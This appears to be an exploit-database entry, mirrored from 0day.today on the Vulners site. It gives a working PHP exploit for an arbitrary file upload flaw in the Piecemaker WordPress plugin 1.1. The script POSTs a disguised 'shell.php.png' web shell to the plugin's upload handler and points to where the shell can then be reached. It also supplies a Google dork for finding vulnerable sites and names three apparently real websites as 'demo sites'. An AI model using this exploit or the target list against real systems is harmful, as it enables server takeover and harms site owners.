Lucene search
K

Wordpress Plugins - Piecemaker Arbitrary File Upload Vulnerability

🗓️ 30 Jun 2012 00:00:00Reported by Ramzi NullType 
zdt
 zdt
🔗 0day.today👁 36 Views

Wordpress Plugins - Piecemaker Arbitrary File Upload Vulnerability Version 1.1. File upload vulnerability allows arbitrary file upload. Visit http://wordpress.org/extend/plugins/the-piecemaker/ for more details

Code
##########################################################################################
# Description : Wordpress Plugins - Piecemaker Arbitrary File Upload Vulnerability
# Version : 1.1
# Link : http://wordpress.org/extend/plugins/the-piecemaker/
# Plugins : http://downloads.wordpress.org/plugin/the-piecemaker.1.1.zip
# Date : 30-06-2012
# Google Dork : inurl:wp-content/plugins/piecemaker/
# Site : 1337day.com Inj3ct0r Exploit Database
# Tested on: win 7
# Demo site: http://www.eyespeek.com/photoandfilm/wp-content/plugins/piecemaker/php.php
#            http://dogschool.gr/wp-content/plugins/piecemaker/php.php
#            http://timesharelegal.net/wp-content/plugins/piecemaker/php.php
# Author : Ramzi Null
###########################################################################################

Exploit :

<?php
$uploadfile="shell.php.png";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/piecemaker/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array("theme[change_bouton_recherche]"=>"@$uploadfile",
              'submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/piecemaker/uploads/shell.php.png

*******************
Greet To : Ned Null
*******************



#  0day.today [2018-04-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation